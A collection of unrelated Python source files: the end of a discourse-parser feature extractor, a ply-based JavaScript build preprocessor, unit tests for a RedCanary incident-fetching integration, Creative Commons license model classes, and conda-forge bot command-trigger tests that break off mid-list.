elif r_num_edus < l_num_edus:
self.features.add('R_Fewer_EDUs_Than_L@%d' % position)
else:
self.features.add('L_R_Same_Subtree_Height@%d' % position)
self.write_Ngram_features(L, 1, position)
self.write_Ngram_features(R, 2, position)
self.write_dominance_set_features(L, R, position)
if not scope:
l_num_sents, l_num_paragraphs = self.write_text_structureal_features(L, 1, position)
r_num_sents, r_num_paragraphs = self.write_text_structureal_features(R, 2, position)
if l_num_sents < r_num_sents:
self.features.add('L_Fewer_Num_Sentences_Than_R@%d' % position)
elif r_num_sents < l_num_sents:
self.features.add('R_Fewer_Num_Sentences_Than_L@%d' % position)
else:
self.features.add('L_R_Same_Num_Sentences@%d' % position)
if l_num_paragraphs < r_num_paragraphs:
self.features.add('L_Fewer_Num_Paragraphs_Than_R@%d' % position)
elif r_num_paragraphs < l_num_paragraphs:
self.features.add('R_Fewer_Num_Paragraphs_Than_L@%d' % position)
else:
self.features.add('L_R_Same_Num_Paragraphs@%d' % position)
self.write_substructure_features(L, 1, position)
self.write_substructure_features(R, 2, position)
self.write_cue_phrase_features(L, 1, position)
self.write_cue_phrase_features(R, 2, position)
l_num_tokens = L.get_num_tokens()
r_num_tokens = R.get_num_tokens()
if l_num_tokens * 1.5 < r_num_tokens:
self.features.add('L_Fewer_Num_Tokens_Than_R@%d' % position)
elif r_num_tokens * 1.5 < l_num_tokens:
self.features.add('R_Fewer_Num_Tokens_Than_L@%d' % position)
else:
self.features.add('L_R_Same_Num_Tokens@%d' % position)
if scope:
assert L.start_sent_id == L.end_sent_id
sent_num_edus = L.doc.sentences[L.start_sent_id].end_edu - L.doc.sentences[L.start_sent_id].start_edu
if (L.get_num_edus() + R.get_num_edus()) == sent_num_edus:
self.features.add('Last_Pair@%d' % position)
else:
if (L.get_num_edus() + R.get_num_edus()) == len(L.doc.edus):
self.features.add('Last_Pair@%d' % position)
return self.features
| |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import sys
import re
from base64 import b64encode
import subprocess as sp
import urllib3
from ply import lex, yacc
# Retain a copy so we don't unneccessarily waste time recreating them
http = urllib3.PoolManager()
global_lexer = None
global_parser = None
tokens = None
def stderr(msg, kill=0):
sys.stdout.flush()
sys.stderr.write(msg)
if kill != 0:
exit(kill)
def stdout(msg):
sys.stdout.write(msg)
def process_file(file_path, script_vars={}, compress=False, escape=None):
'''This is essentially a router for matching file extensions with the
appropriate processor. If no appropriate processor is available
default_processor is used. Since some content may be embedded in a string
it may be necessary to escape the quote characters for that string
implementation'''
# get the file extention
ext = file_path.rsplit('.', 1)[-1]
handler = {
'htm': html_processor,
'html': html_processor,
'hbs': html_processor,
'svg': svg_processor,
'sass': sass_processor,
'css': css_processor,
'js': js_processor
}.get(ext, default_processor)
content = handler(file_path, script_vars, compress)
# if the content is used in a string then we'll need to ensure the correct
# string syntax is escaped.
# TODO: consider performing a full escape
if escape:
content = content.replace('\\', '\\\\') \
.replace(escape, "\\{0}".format(escape))
return content
def import_file(filepath, dirpath):
base64 = False
# Base 64 encode the imported file
if filepath.startswith('base64:'):
base64 = True
filepath = filepath[7:]
# root relative import
if filepath.startswith('/'):
filepath = filepath[1:]
else:
stderr(dirpath)
stderr(filepath)
filepath = '{0}/{1}'.format(dirpath, filepath)
data = process_file(filepath, compress=True, escape="'")
if base64:
data = b64encode(data.encode()).decode('utf-8')
return data
#TODO: catch url contents
def include_file(filepath, dirpath, script_vars):
global http
# TODO: proto = file:// for files from root
proto = r'^http(s)?://'
if re.match(proto, filepath):
response = http.request('GET', filepath)
if response.status != 200:
msg = 'Error while including: {0}, status: {1}'
msg = msg.format(filepath, response.status)
stderr(msg, 1)
# assume the file is utf-8 encoded unless otherwise stated in the
# content type
content_type = response.headers['content-type']
content_type = content_type.split('; ')
charset = 'utf-8'
for ct in content_type:
match = re.match(r'^charset=(.*?)$', ct)
if match:
charset = match.group(1)
break
return response.data.decode(charset)
if filepath.startswith('/'):
path = filepath[1:]
else:
path = '{0}/{1}'.format(dirpath, filepath)
return js_processor(path, script_vars)
###############################################################################
# Lexer #######################################################################
###############################################################################
def create_lexer(file_path, script_vars):
'''This will generate the lexer for the processor. Since this can be time
consuming and may be called for each individual file ( to which there may
be many ), then we'll store a lexer globally and clone it each time we need
a new one'''
global global_lexer
global tokens
dir_path = os.path.dirname(file_path)
if global_lexer:
lexer = global_lexer.clone()
# used when displaying systax errors
lexer.file_path = file_path
# used for finding files via a relative path
lexer.dir_path = dir_path
# we store the variables here as they're generated
lexer.script_vars = script_vars
return lexer
reserved = {
'begin_scope': 'SCOPE_BEGIN',
'end_scope': 'SCOPE_END',
'use_strict': 'USE_STRICT',
'include': 'INCLUDE',
'echo': 'ECHO',
}
# A list of js reserved ids that we'll recognise in buildr
js_reserved = {
'window': 'STRING',
'undefined': 'STRING',
'$': 'STRING'
}
tokens = [
'BLOCK',
'DELIMITER',
'NEW_LINE',
'COMMENT',
'SEPARATOR',
'LPAREN',
'RPAREN',
'STRING',
'ID'] + list(reserved.values())
t_DELIMITER = r';'
t_SEPARATOR = r','
t_COMMENT = r'\#.*?\n'
t_LPAREN = r'\('
t_RPAREN = r'\)'
def t_NEW_LINE(t):
r'\n'
t.lexer.lineno += 1
return t
# we use this to represent a block of text
def t_BLOCK(t):
r'%%BLOCK_BEGIN%%(\n|.)*?%%BLOCK_END%%'
# we're only interested in the content of the block
# TODO: move to parser
block = r'%%BLOCK_BEGIN%%((\n|.)*?)%%BLOCK_END%%'
t.value = re.match(block, t.value).group(1)
t.lexer.lineno += t.value.count('\n')
return t
# string token processor
def t_STRING(t):
r'"(\\"|[^"])*?"'
# remove the quotes and unescape the text
# TODO: move to parser
str = t.value[1:-1]
t.value = str.encode().decode('unicode-escape')
return t
def t_ID(t):
r'[a-zA-Z_][a-zA-Z0-9_]*'
# cast the id to a reserved token if its found in the dict
t.type = reserved.get(t.value, 'ID')
if t.type != 'ID':
return t
# cast the id to a js_reserved token if its found in the dict
t.type = js_reserved.get(t.value, 'ID')
return t
t_ignore = '[ \t]' # TODO: add comment?
#error processor
def t_error(t):
msg = 'Unknown text "%s"' % t.value[0]
stderr(msg)
global_lexer = lex.lex()
lexer = global_lexer.clone()
# used when displaying systax errors
lexer.file_path = file_path
# used for finding files via a relative path
lexer.dir_path = dir_path
# we store the variables here as they're generated
lexer.script_vars = script_vars
return lexer
###############################################################################
# Parser ######################################################################
###############################################################################
def create_parser():
'''This will generate the parser for the processor. Since this can be time
consuming and may be called for each individual file ( to which there may
be many ), then we'll store a parser globally return that every time we
need a new one'''
global global_parser
global tokens
if global_parser:
return global_parser
#TODO: FIX
# calculate the distance of the lexer position from the previous new line
def find_column(input, t):
last_cr = input.rfind('\n', 0, t.lexpos)
if last_cr < 0:
last_cr = 0
return t.lexpos - last_cr + 1
def p_output(p):
'''output : output block
| output delimiter
| output new_line
| block'''
p[0] = p[1] + p[2] if len(p) > 2 else p[1]
def p_use_scrict(p):
'''block : USE_STRICT delimiter
| USE_STRICT new_line
| USE_STRICT block'''
p[0] = '"use strict";\n'
def p_include_1(p):
'''block : INCLUDE string delimiter
| INCLUDE string new_line
| INCLUDE string block'''
# TODO: actually include
data = include_file(p[2], p.lexer.dir_path, p.lexer.script_vars)
p[0] = '{0}\n{1}'.format(data, p[3])
def p_echo(p):
'''block : ECHO string delimiter
| ECHO string new_line
| ECHO string block'''
string = p[2]
# TODO: move to p_string ???
importer = r'\$\{(.*?)\}'
while True:
match = re.search(importer, string)
if not match:
break
source, value = match.group(0), match.group(1)
value = import_file(value, p.lexer.dir_path)
string = string.replace(source, value, 1)
p[0] = '{0}\n{1}'.format(string, p[3])
## Function scopes
def p_begin_scope(p):
'''begin_scope : SCOPE_BEGIN LPAREN RPAREN
| begin_scope_p RPAREN
| begin_scope new_line
| begin_scope delimiter'''
p[0] = '' if len(p) == 4 else p[1]
def p_begin_scope_p1(p):
'''begin_scope_p : SCOPE_BEGIN LPAREN string'''
p[0] = p[3]
def p_begin_scope_p2(p):
'''begin_scope_p : begin_scope_p separator string'''
p[0] = '%s, %s' % (p[1], p[3])
def p_end_scope(p):
'''end_scope : SCOPE_END LPAREN RPAREN
| end_scope_p RPAREN'''
p[0] = '' if len(p) == 4 else p[1]
def p_end_scope_p1(p):
'''end_scope_p : SCOPE_END LPAREN string'''
p[0] = p[3]
def p_end_scope_p2(p):
'''end_scope_p : end_scope_p separator string'''
p[0] = '%s, %s' % (p[1], p[3])
# join the scopes
def p_scope(p):
'block : begin_scope output end_scope'
p[0] = ';(function(%s){\n%s\n})(%s);\n' % (p[1], p[2], p[3])
def p_separator(p):
'''separator : separator new_line
| SEPARATOR'''
p[0] = ','
def p_string(p):
'string : STRING'
p[0] = p[1]
def p_block_1(p):
'block : BLOCK'
p[0] = p[1]
def p_new_line(p):
'new_line : NEW_LINE'
p[0] = ''
def p_delimiter(p):
'''delimiter : DELIMITER
| COMMENT
| begin_scope end_scope''' # <-
# an empty scope is pointless, get rid of it
p[0] = ''
def p_error(p):
# msg = repr( dir( p ) )
msg = 'Syntax error: unexpected {0} "{1}" in {2} line {3}\n'.format(
p.type, p.value, p.lexer.file_path, p.lineno)
sys.stderr.write(msg)
# TODO: if ( debug )
global_parser = yacc.yacc()
return global_parser
###############################################################################
# Default Processor ###########################################################
###############################################################################
def default_processor(file_path, script_vars={}, compress=False):
'''not yet implemented'''
return ''
###############################################################################
# SASS Application ############################################################
###############################################################################
def call_sass(params):
params = ' '.join(params)
cmd = 'sass {0}'.format(params)
proc = sp.Popen(cmd, stdout=sp.PIPE, stdin=sp.PIPE, shell=True)
output, error = proc.communicate()
return output.decode('utf-8')
###############################################################################
# SASS Processor ##############################################################
###############################################################################
def sass_processor(file_path, script_vars={}, compress=False):
'''This require ruby and sass to be installed.'''
params = []
if compress:
params.append('-t compressed')
params.append(file_path)
css = call_sass(params)
# sass leaves a trailing \n
if compress:
css = css.replace('\n', '')
return css
###############################################################################
# SVG Processor ###############################################################
###############################################################################
def svg_processor(file_path, script_vars={}, compress=False):
''''''
try:
svg = open(file_path, 'r').read()
except (OSError, IOError) as e:
sys.stderr(repr(e), 1)
if compress:
#TODO: work out some better compression if possible
svg = svg.replace('\n', '').replace('\r', '')
return svg
###############################################################################
# HTML Processor ##############################################################
###############################################################################
def html_processor(file_path, script_vars={}, compress=False):
'''This requires java installed for compression'''
# TODO: Do some actual processing ( maybe use bottles preprocessor )
try:
source = open(file_path, 'r').read()
except (OSError, IOError) as e:
stderr(repr(e), 1)
if compress:
# we'll use the html compressor in /tools
cmd = 'java -jar {0}/tools/html-compressor/htmlcompressor-1.5.3.jar' \
.format(os.path.dirname(__file__))
proc = sp.Popen(cmd, stdout=sp.PIPE, stdin=sp.PIPE, shell=True)
proc.stdin.write(source.encode())
output, error = proc.communicate()
source = output.decode('utf-8')
return source
###############################################################################
# CSS Processor ###############################################################
###############################################################################
def css_processor(file_path, script_vars={}, compress=False):
'''Not yet implemented.'''
return ''
###############################################################################
# JS Processor ################################################################
###############################################################################
def js_processor(file_path, script_vars={}, compress=False):
'''Process a given source file, returning the processed JS. the optional
vars allow for variables not present in the script to bhe passed in to the
processor. By default compression is not carried out and single quotes/new
lines are not escaped. compression should be enabled only at the top level
and escaping should only be performed where the result will be inserted
into a string'''
# todo should strings be completely escaped or not?
lexer = create_lexer(file_path, script_vars)
parser = create_parser()
try:
source = open(file_path, 'r').read()
except (OSError, IOError) as e:
stderr(repr(e), 1)
code = enclose_js(source)
code = parser.parse(code, lexer=lexer)
if compress:
cmd = 'java -jar {0}/tools/yui-compressor/yuicompressor-2.4.8.jar --type js' \
.format(os.path.dirname(__file__))
proc = sp.Popen(cmd, stdout=sp.PIPE, stdin=sp.PIPE, shell=True)
proc.stdin.write(code.encode())
output, error = proc.communicate()
code = output.decode('utf-8')
return code
# TODO: use a tokenising switcher in the lexer
def enclose_js(source):
'''In order to aid tokenising we'll wrap the JS code in a JS block and
remove the preprocessor code from the block by finding it and replacing the
comment tokens with block tokens. We're effectively inverting the code from
JS code with buildr blocks to buildr code with JS blocks'''
# wrap all the code ( useful for when there is no buildr code )
code = '%%BLOCK_BEGIN%%{0}%%BLOCK_END%%'.format(source)
block = r'/\*##(.*?)\*/'
container = '%%BLOCK_END%%{0}%%BLOCK_BEGIN%%'
# replace all buildr code blocks
while True:
match = re.search(block, code, re.DOTALL)
if not match:
break
comment, content = match.group(0), match.group(1)
content = container.format(content)
code = code.replace(comment, content, 1)
line = r'//##(.*?)\n'
container = '%%BLOCK_END%%{0}\n%%BLOCK_BEGIN%%'
while True:
match = re.search(line, code)
if not match:
break
comment, content = match.group(0), match.group(1)
content = container.format(content)
code = code.replace(comment, content, 1)
return code
| |
import demistomock as demisto
import json
import RedCanary
last_run_dict = {"time": "2019-12-13T17:23:22Z", "last_event_ids": []}
latest_time_of_occurrence_of_incidents1 = "2019-12-30T22:00:50Z"
latest_time_of_occurrence_of_incidents2 = "2020-12-25T02:07:37Z"
number_of_incidents = 3
class Mocker:
# this mocker will return a different response in every following call
def __init__(self):
self.counter = 0
self.res1 = res1
self.res2 = res2
def execute(self):
self.counter = self.counter + 1
if self.counter % 2 == 0:
return self.res1
return self.res2
with open("./TestData/incidents.json") as f:
data = json.load(f)
with open("TestData/incidents2.json") as f2:
data2 = json.load(f2)
with open("./TestData/get_full_timeline_raw1.json") as f3:
res1 = json.load(f3)
with open("./TestData/get_full_timeline_raw2.json") as f4:
res2 = json.load(f4)
def test_fetch_when_last_run_is_time(mocker):
"""Unit test
Given
- raw response of the http request
When
- fetching incidents
Then
- check the number of incidents that are being created
check that the time in last_run is the on of the latest incident
"""
mocker.patch.object(demisto, "incidents")
mocker.patch.object(demisto, "setLastRun")
mocker.patch.object(demisto, "getLastRun")
mocker.patch.object(
RedCanary, "get_unacknowledged_detections", return_value=data["data"]
)
mocker.patch.object(RedCanary, "get_full_timeline", return_value=None)
last_run, incidents = RedCanary.fetch_incidents(last_run_dict)
assert len(incidents) == number_of_incidents
assert last_run["time"] == latest_time_of_occurrence_of_incidents1
def test_get_endpoint_context():
"""
Given:
- Endpoint data with missing MAC address details (None)
When:
- Listing endpoints and generating endpoint standard context
Then:
- Ensure get_endpoint_context runs successfully
- Verify expected endpoint standard context is returned
"""
endpoint = [
{
'id': '1234',
'attributes': {
'hostname': 'hostname1',
'platform': 'OS X',
'operating_system': 'Mac OSX 10.14.6',
'is_isolated': False,
'is_decommissioned': False,
'endpoint_network_addresses': [
{
'attributes': {
'ip_address': {
'attributes': {
'ip_address_matches_rfc_1918?': True,
'ip_address_reverse_dns': None,
'ip_address_defanged': '192.169.1[.]16',
'ip_address_is_link_local?': False,
'ip_address_matches_rfc_4193?': False,
'ip_address': '192.169.1.16'
},
'type': 'primitives.IpAddress'
},
'mac_address': {
'attributes': {
'address': 'g9:gg:c2:0f:3d:5f'
},
'type': 'primitives.MacAddress'
}
}
},
{
'attributes': {
'ip_address': {
'attributes': {
'ip_address_matches_rfc_1918?': False,
'ip_address_reverse_dns': None,
'ip_address_defanged': '100.144.153[.]501',
'ip_address_is_link_local?': False,
'ip_address_matches_rfc_4193?': False,
'ip_address': '100.144.153.501'
},
'type': 'primitives.IpAddress'
},
'mac_address': None
}
}
]
}
}
]
endpoint_context = RedCanary.get_endpoint_context(endpoint)
assert endpoint_context == [{
'Hostname': 'hostname1',
'ID': '1234',
'IPAddress': ['192.169.1.16', '100.144.153.501'],
'IsDecommissioned': False,
'IsIsolated': False,
'MACAddress': ['g9:gg:c2:0f:3d:5f'],
'OS': 'OS X',
'OSVersion': 'Mac OSX 10.14.6'}]
def test_fetch_multiple_times_when_already_fetched_incident_keep(mocker):
"""Unit test
Given
- raw response of the http request
When
- fetching incidents couple of times
Then
- fetch for 3 times
in the first time makes sure 3 incidents were created
in the others there the same incidents are being fetched as data but no new incidents are being created
"""
mocker.patch.object(demisto, "incidents")
mocker.patch.object(demisto, "setLastRun")
mocker.patch.object(demisto, "getLastRun")
mocker.patch.object(RedCanary, "get_unacknowledged_detections", return_value=data["data"])
mocker.patch.object(RedCanary, "get_full_timeline", return_value=None)
# fetching for the first time
last_run, incidents = RedCanary.fetch_incidents(last_run_dict)
assert len(incidents) == 3
assert last_run["time"] == "2019-12-30T22:00:50Z"
# fetching for the second time
last_run, incidents = RedCanary.fetch_incidents(last_run)
assert len(incidents) == 0
assert last_run["time"] == "2019-12-30T22:00:50Z"
# fetching for the third time
last_run, incidents = RedCanary.fetch_incidents(last_run)
assert len(incidents) == 0
assert last_run["time"] == "2019-12-30T22:00:50Z"
def test_fetch_multiple_times_with_new_incidents(mocker):
"""Unit test
Given
- raw response of the http request
When
- fetching incidents couple of times
fetch incidents for the first time - as in previous tests
fetch again with new incidents
Then
one of the incidents in the new fetch was shown before
makes sure it is not created again
the last_run in getting updated
"""
mocker.patch.object(demisto, "incidents")
mocker.patch.object(demisto, "setLastRun")
mocker.patch.object(demisto, "getLastRun")
mocker.patch.object(RedCanary, "get_unacknowledged_detections", return_value=data["data"])
mocker.patch.object(RedCanary, "get_full_timeline", return_value=None)
# fetching for the first time
last_run, incidents = RedCanary.fetch_incidents(last_run_dict)
assert len(incidents) == 3
assert last_run["time"] == "2019-12-30T22:00:50Z"
# fetching for the second time
mocker.patch.object(RedCanary, "get_unacknowledged_detections", return_value=data2["data"])
last_run, incidents = RedCanary.fetch_incidents(last_run)
# only one incidents is being created out of the 2 that were fetched
assert len(incidents) == 1
assert last_run["time"] == latest_time_of_occurrence_of_incidents2
def test_def_get_full_timeline(mocker):
"""Unit test
Given
- raw response of the http request from 2 different requests
- the data is the same but the page number is different
When
- keep getting the same data in different pages
Then
make sure the loop stops and doesn't cause a timeout
"""
response = Mocker()
mocker.patch.object(RedCanary, "http_get", return_value=response.execute())
activities = RedCanary.get_full_timeline(1)
result1 = response.execute()
result2 = response.execute()
# make sure the results are not the same, they are from different pages, but the data is
assert not result1 == result2
assert result1['data'] == result2['data']
# make sure the loop ends
assert activities
| |
# License models
from le_utils.constants import licenses
from .. import config
from ..exceptions import UnknownLicenseError
def get_license(license_id, copyright_holder=None, description=None):
if license_id == licenses.CC_BY:
return CC_BYLicense(copyright_holder=copyright_holder)
elif license_id == licenses.CC_BY_SA:
return CC_BY_SALicense(copyright_holder=copyright_holder)
elif license_id == licenses.CC_BY_ND:
return CC_BY_NDLicense(copyright_holder=copyright_holder)
elif license_id == licenses.CC_BY_NC:
return CC_BY_NCLicense(copyright_holder=copyright_holder)
elif license_id == licenses.CC_BY_NC_SA:
return CC_BY_NC_SALicense(copyright_holder=copyright_holder)
elif license_id == licenses.CC_BY_NC_ND:
return CC_BY_NC_NDLicense(copyright_holder=copyright_holder)
elif license_id == licenses.ALL_RIGHTS_RESERVED:
return AllRightsLicense(copyright_holder=copyright_holder)
elif license_id == licenses.PUBLIC_DOMAIN:
return PublicDomainLicense(copyright_holder=copyright_holder)
elif license_id == licenses.SPECIAL_PERMISSIONS:
return SpecialPermissionsLicense(
copyright_holder=copyright_holder, description=description
)
else:
raise UnknownLicenseError(
"{} is not a valid license id. (Valid license are {})".format(
license_id, [l[0] for l in licenses.choices]
)
)
class License(object):
license_id = None # (str): content's license based on le_utils.constants.licenses
copyright_holder = (
None # (str): name of person or organization who owns license (optional)
)
description = None # (str): description of the license (optional)
require_copyright_holder = True
def __init__(self, copyright_holder=None, description=None):
self.copyright_holder = copyright_holder or ""
self.description = description
def get_id(self):
return self.license_id
def validate(self):
assert (
not self.require_copyright_holder or self.copyright_holder != ""
), "Assertion Failed: {} License requires a copyright holder".format(
self.license_id
)
assert isinstance(
self.copyright_holder, str
), "Assertion Failed: Copyright holder must be a string"
def truncate_fields(self):
if (
self.description
and len(self.description) > config.MAX_LICENSE_DESCRIPTION_LENGTH
):
config.print_truncate(
"license_description", self.license_id, self.description
)
self.description = self.description[: config.MAX_LICENSE_DESCRIPTION_LENGTH]
if (
self.copyright_holder
and len(self.copyright_holder) > config.MAX_COPYRIGHT_HOLDER_LENGTH
):
config.print_truncate(
"copyright_holder", self.license_id, self.copyright_holder
)
self.copyright_holder = self.copyright_holder[
: config.MAX_COPYRIGHT_HOLDER_LENGTH
]
def as_dict(self):
return {
"license_id": self.license_id,
"copyright_holder": self.copyright_holder,
"description": self.description,
}
class CC_BYLicense(License):
"""
The Attribution License lets others distribute, remix, tweak,
and build upon your work, even commercially, as long as they credit
you for the original creation. This is the most accommodating of
licenses offered. Recommended for maximum dissemination and use of
licensed materials.
Reference: https://creativecommons.org/licenses/by/4.0
"""
license_id = licenses.CC_BY
class CC_BY_SALicense(License):
"""
The Attribution-ShareAlike License lets others remix, tweak, and
build upon your work even for commercial purposes, as long as they
credit you and license their new creations under the identical terms.
This license is often compared to "copyleft" free and open source
software licenses. All new works based on yours will carry the same
license, so any derivatives will also allow commercial use. This is
the license used by Wikipedia, and is recommended for materials that
would benefit from incorporating content from Wikipedia and similarly
licensed projects.
Reference: https://creativecommons.org/licenses/by-sa/4.0
"""
license_id = licenses.CC_BY_SA
class CC_BY_NDLicense(License):
"""
The Attribution-NoDerivs License allows for redistribution, commercial
and non-commercial, as long as it is passed along unchanged and in
whole, with credit to you.
Reference: https://creativecommons.org/licenses/by-nd/4.0
"""
license_id = licenses.CC_BY_ND
class CC_BY_NCLicense(License):
"""
The Attribution-NonCommercial License lets others remix, tweak, and
build upon your work non-commercially, and although their new works
must also acknowledge you and be non-commercial, they don't have to
license their derivative works on the same terms.
Reference: https://creativecommons.org/licenses/by-nc/4.0
"""
license_id = licenses.CC_BY_NC
class CC_BY_NC_SALicense(License):
"""
The Attribution-NonCommercial-ShareAlike License lets others remix, tweak,
and build upon your work non-commercially, as long as they credit you and
license their new creations under the identical terms.
Reference: https://creativecommons.org/licenses/by-nc-sa/4.0
"""
license_id = licenses.CC_BY_NC_SA
class CC_BY_NC_NDLicense(License):
"""
The Attribution-NonCommercial-NoDerivs License is the most restrictive of
our six main licenses, only allowing others to download your works and share
them with others as long as they credit you, but they can't change them in
any way or use them commercially.
Reference: https://creativecommons.org/licenses/by-nc-nd/4.0
"""
license_id = licenses.CC_BY_NC_ND
class AllRightsLicense(License):
"""
The All Rights Reserved License indicates that the copyright holder reserves,
or holds for their own use, all the rights provided by copyright law under
one specific copyright treaty.
Reference: http://www.allrights-reserved.com
"""
license_id = licenses.ALL_RIGHTS_RESERVED
class PublicDomainLicense(License):
"""
Public Domain work has been identified as being free of known restrictions
under copyright law, including all related and neighboring rights.
Reference: https://creativecommons.org/publicdomain/mark/1.0
"""
require_copyright_holder = False
license_id = licenses.PUBLIC_DOMAIN
class SpecialPermissionsLicense(License):
"""
Special Permissions is a custom license to use when the current licenses
do not apply to the content. The owner of this license is responsible for
creating a description of what this license entails.
"""
license_id = licenses.SPECIAL_PERMISSIONS
def __init__(self, copyright_holder=None, description=None):
assert description, "Special Permissions licenses must have a description"
super(SpecialPermissionsLicense, self).__init__(
copyright_holder=copyright_holder, description=description
)
| |
import os
import unittest
try:
import unittest.mock as mock
except ImportError:
import mock
from requests.exceptions import RequestException
from conda_forge_webservices.commands import (
pr_detailed_comment as _pr_detailed_comment,
issue_comment as _issue_comment)
def pr_detailed_comment(comment, org_name='conda-forge',
repo_name='python-feedstock', pr_repo=None,
pr_owner='some-user', pr_branch='master', pr_num=1):
if pr_repo is None:
pr_repo = repo_name
return _pr_detailed_comment(org_name, repo_name,
pr_owner, pr_repo, pr_branch, pr_num, comment)
def issue_comment(title, comment, issue_num=1,
org_name='conda-forge', repo_name='python-feedstock'):
return _issue_comment(org_name, repo_name, issue_num, title, comment)
class TestCommands(unittest.TestCase):
def setUp(self):
if 'GH_TOKEN' not in os.environ:
os.environ['GH_TOKEN'] = 'fake' # github access is mocked anyway
self.kill_token = True
else:
self.kill_token = False
def tearDown(self):
if self.kill_token:
del os.environ['GH_TOKEN']
@mock.patch('conda_forge_webservices.commands.add_bot_rerun_label')
@mock.patch('conda_forge_webservices.commands.rerender')
@mock.patch('conda_forge_webservices.commands.make_noarch')
@mock.patch('conda_forge_webservices.commands.relint')
@mock.patch('conda_forge_webservices.commands.update_team')
@mock.patch('conda_forge_webservices.commands.update_circle')
@mock.patch('conda_forge_webservices.commands.update_cb3')
@mock.patch('github.Github')
@mock.patch('conda_forge_webservices.commands.Repo')
def test_pr_command_triggers(
self, repo, gh, update_cb3, update_circle,
update_team, relint, make_noarch, rerender, add_bot_rerun_label):
update_cb3.return_value = (True, "hi")
commands = [
(rerender, False, [
'@conda-forge-admin, please rerender',
'@conda-forge-admin, rerender',
'@conda-forge-admin, re-render',
'@conda-forge-admin, please re-render',
'@conda-forge-admin: PLEASE RERENDER',
'@conda-forge-admin: RERENDER',
'something something. @conda-forge-admin: please re-render',
'something something. @conda-forge-admin: re-render',
], [
'@conda-forge admin is pretty cool. please rerender for me?',
'@conda-forge admin is pretty cool. rerender for me?',
'@conda-forge-admin, go ahead and rerender for me',
'please re-render, @conda-forge-admin',
're-render, @conda-forge-admin',
'@conda-forge-linter, please lint',
'@conda-forge-linter, lint',
]),
(make_noarch, False, [
'@conda-forge-admin, please add noarch python',
'@conda-forge-admin, add noarch python',
(
'@conda-forge-linter, please lint, and @conda-forge-admin, '
'please make `noarch: python`'
),
(
'@conda-forge-linter, lint, and @conda-forge-admin, make '
'`noarch: python`'
),
'@CONDA-FORGE-ADMIN please add `noarch python`',
'@CONDA-FORGE-ADMIN add `noarch python`',
'hey @conda-forge-admin : please make noarch: python',
'hey @conda-forge-admin : make noarch: python',
], [
'@conda-forge-linter, please lint',
'@conda-forge-linter, lint',
'sure wish @conda-forge-admin would please add noarch python',
'sure wish @conda-forge-admin would add noarch python',
]),
(update_cb3, False, [
'@conda-forge-admin, please update for CB3',
'@conda-forge-admin, please update for conda-build 3',
'@conda-forge-admin, update for CB3',
'@conda-forge-admin, update for conda-build 3',
], [
'@conda-forge-admin, please lint'
'@conda-forge-admin, lint'
]),
(relint, True, [
'@conda-forge-admin, please lint',
'@conda-forge-admin, lint',
'@CONDA-FORGE-LINTER, please relint',
'@CONDA-FORGE-LINTER, relint',
'hey @conda-forge-linter please re-lint!',
'hey @conda-forge-linter re-lint!',
], [
'@conda-forge-admin should probably lint again',
]),
(add_bot_rerun_label, False, [
'@conda-forge-admin, please rerun the bot',
'@conda-forge-admin, rerun the bot',
'@conda-forge-admin, please rerun bot',
'@conda-forge-admin, rerun bot',
'@conda-forge-admin: RERUN BOT',
'something something. @conda-forge-admin: please rerun bot',
], [
'@conda-forge admin is pretty cool. please rerun bot for me?',
'@conda-forge admin is pretty cool. rerun the bot for me?',
'@conda-forge-admin, go ahead and rerun the bot for me',
'please rerun the bot, @conda-forge-admin',
'rerun bot, @conda-forge-admin',
]),
]
for command, on_sr, should, should_not in commands:
for msg in should:
command.reset_mock()
print(msg, end=' ' * 30 + '\r')
pr_detailed_comment(msg)
command.assert_called()
command.reset_mock()
print(msg, end=' ' * 30 + '\r')
pr_detailed_comment(msg, repo_name='staged-recipes')
if on_sr:
command.assert_called()
else:
command.assert_not_called()
for msg in should_not:
command.reset_mock()
print(msg, end=' ' * 30 + '\r')
pr_detailed_comment(msg)
command.assert_not_called()
@mock.patch('conda_forge_webservices.commands.add_user')
@mock.patch('conda_forge_webservices.commands.add_py')
@mock.patch('conda_forge_webservices.commands.make_rerender_dummy_commit')
@mock.patch('conda_forge_webservices.commands.add_bot_automerge')
@mock.patch('conda_forge_webservices.commands.rerender')
@mock.patch('conda_forge_webservices.commands.make_noarch')
@mock.patch('conda_forge_webservices.commands.relint')
@mock.patch('conda_forge_webservices.commands.update_team')
@mock.patch('conda_forge_webservices.commands.update_circle')
@mock.patch('conda_forge_webservices.commands.update_cb3')
@mock.patch('github.Github')
@mock.patch('conda_forge_webservices.commands.Repo')
def test_issue_command_triggers(
self, git_repo, gh, update_cb3, update_circle,
update_team, relint, make_noarch, rerender, add_bot_automerge,
rerender_dummy_commit, add_py, add_user):
update_cb3.return_value = (True, "hi")
add_py.return_value = True
add_user.return_value = True
commands = [
(add_bot_automerge, [
'@conda-forge-admin, please add bot automerge',
'@conda-forge-admin, add bot automerge',
'@conda-forge-admin: PLEASE ADD BOT AUTOMERGE',
'@conda-forge-admin: ADD BOT AUTOMERGE',
'something something. @conda-forge-admin: please add bot automerge',
'something something. @conda-forge-admin: add bot automerge',
], [
'@conda-forge admin is pretty cool. please add bot automerge for me?',
'@conda-forge admin is pretty cool. add bot automerge for me?',
'@conda-forge-admin, go ahead and add bot automerge for me',
'please add bot automerge, @conda-forge-admin',
'add bot automerge, @conda-forge-admin',
]),
(rerender, [
'@conda-forge-admin, please rerender',
'@conda-forge-admin, rerender',
'@conda-forge-admin, please re-render',
'@conda-forge-admin, re-render',
'@conda-forge-admin: PLEASE RERENDER',
'@conda-forge-admin: RERENDER',
'something something. @conda-forge-admin: please re-render',
'something something. @conda-forge-admin: re-render',
], [
'@conda-forge admin is pretty cool. please rerender for me?',
'@conda-forge admin is pretty cool. rerender for me?',
'@conda-forge-admin, go ahead and rerender for me',
'please re-render, @conda-forge-admin',
're-render, @conda-forge-admin',
'@conda-forge-linter, please lint',
'@conda-forge-linter, lint',
]),
(make_noarch, [
'@conda-forge-admin, please add noarch python',
'@conda-forge-admin, add noarch python',
'@conda-forge-admin, please make `noarch: python`',
'@conda-forge-admin, make `noarch: python`',
'@conda-forge-admin please add `noarch python`',
'@conda-forge-admin add `noarch python`',
'hey @conda-forge-admin : please make noarch: python',
'hey @conda-forge-admin : make noarch: python',
], [
'@conda-forge-linter, please lint',
'@conda-forge-linter, lint',
'sure wish @conda-forge-admin would please add noarch python',
'sure wish @conda-forge-admin would add noarch python',
]),
(update_cb3, [
'@conda-forge-admin, please update for cb-3',
'@conda-forge-admin, update for cb-3',
